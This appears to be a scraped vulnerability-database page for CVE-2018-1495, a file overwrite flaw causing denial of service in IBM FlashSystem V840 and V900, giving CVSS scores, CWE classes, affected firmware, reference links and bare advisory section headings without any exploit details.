    "data": [
      {
        "problemtype": "CWE-269",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-125160"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005792"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-1495"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1012280"
      },
      {
        "trust": 1.7,
        "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1012281"
      },
      {
        "trust": 1.7,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/141148"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1495"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-1495"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1438"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1463"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1464"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1465"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1467"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1433"
      },
      {
        "trust": 0.1,
        "url": "https://www.example.com/create_admin.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1434"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1462"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1466"
      },
      {
        "trust": 0.1,
        "url": "https://www.example.com"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1461"
      },
      {
        "trust": 0.1,
        "url": "https://v7ku01/sonasinfoservlet?challenge=1"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-125160"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005792"
      },
      {
        "db": "PACKETSTORM",
        "id": "147601"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-971"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-1495"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-125160"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005792"
      },
      {
        "db": "PACKETSTORM",
        "id": "147601"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-971"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-1495"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-05-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-125160"
      },
      {
        "date": "2018-07-30T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-005792"
      },
      {
        "date": "2018-05-14T17:23:39",
        "db": "PACKETSTORM",
        "id": "147601"
      },
      {
        "date": "2018-05-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201805-971"
      },
      {
        "date": "2018-05-29T17:29:00.387000",
        "db": "NVD",
        "id": "CVE-2018-1495"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-125160"
      },
      {
        "date": "2018-07-30T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-005792"
      },
      {
        "date": "2019-10-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201805-971"
      },
      {
        "date": "2024-11-21T03:59:55.367000",
        "db": "NVD",
        "id": "CVE-2018-1495"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-971"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "IBM FlashSystem V840 and  V900 Vulnerabilities related to authorization, authority, and access control in products",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005792"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-971"
      }
    ],
    "trust": 0.6
  }
}

fkie_cve-2018-1495

Vulnerability from fkie_nvd

Published

2018-05-29 17:29

Modified

2024-11-21 03:59

Severity ?

6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148.

References

URL	Tags
psirt@us.ibm.com	http://www.ibm.com/support/docview.wss?uid=ssg1S1012280	Vendor Advisory
psirt@us.ibm.com	http://www.ibm.com/support/docview.wss?uid=ssg1S1012281	Vendor Advisory
psirt@us.ibm.com	https://exchange.xforce.ibmcloud.com/vulnerabilities/141148	VDB Entry, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.ibm.com/support/docview.wss?uid=ssg1S1012280	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.ibm.com/support/docview.wss?uid=ssg1S1012281	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/141148	VDB Entry, Vendor Advisory

Impacted products

Vendor	Product	Version
ibm	flashsystem_900_firmware	-
ibm	flashsystem_900	-
ibm	flashsystem_840_firmware	-
ibm	flashsystem_840	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:ibm:flashsystem_900_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "191939BC-A358-434F-BAEF-CADD0BEAD091",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:ibm:flashsystem_900:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8D92192-32CA-461B-8326-955F71EFA8E3",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:ibm:flashsystem_840_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "09EAED7A-46E1-428E-8DB1-0843D37906C9",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:ibm:flashsystem_840:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "36C11C6C-316E-4C15-96D8-5E6F1F1907A1",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148."
    },
    {
      "lang": "es",
      "value": "Los productos IBM FlashSystem V840 y V900 podr\u00edan permitir que un atacante autenticado con acceso especializado sobrescriba archivos arbitrarios. Esto podr\u00eda provocar una denegaci\u00f3n de servicio (DoS). IBM X-Force ID: 141148."
    }
  ],
  "id": "CVE-2018-1495",
  "lastModified": "2024-11-21T03:59:55.367",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.5,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "psirt@us.ibm.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-05-29T17:29:00.387",
  "references": [
    {
      "source": "psirt@us.ibm.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012280"
    },
    {
      "source": "psirt@us.ibm.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012281"
    },
    {
      "source": "psirt@us.ibm.com",
      "tags": [
        "VDB Entry",
        "Vendor Advisory"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/141148"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012280"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012281"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "VDB Entry",
        "Vendor Advisory"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/141148"
    }
  ],
  "sourceIdentifier": "psirt@us.ibm.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-269"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2018-1495

Vulnerability from cvelistv5

wid-sec-w-2024-1173

Vulnerability from csaf_certbund

WID-SEC-W-2024-1173

Vulnerability from csaf_certbund

gsd-2018-1495

Vulnerability from gsd

ghsa-j2pq-5cv8-53j8

Vulnerability from github

var-201805-0351

Vulnerability from variot

Introduction

Affected Software And Versions

CVE

Vulnerability Overview

Vulnerability Details

CVE-2018-1434: Web interface vulnerable to CSRF

CVE-2018-1462: Ineffective rBash Configuration

CVE-2018-1463: World readable credentials and encryption keys

Partial directory listing of /persist/ on the Unified system:

Partial directory listing of /mnt/plfs on the Flash system:

CVE-2018-1464: Sensitive file disclosure of files readable by root

CVE-2018-1495: Arbitrary file deletion

CVE-2018-1467: Unauthenticated information disclosure

CVE-2018-1465: Unprivileged web server process may read SSL private key

CVE-2018-1466: Weak password hashing algorithm used

CVE-2018-1461: Missing Security Related HTTP Headers

Author

Timeline

fkie_cve-2018-1495

Vulnerability from fkie_nvd

Tags

Sightings

Nomenclature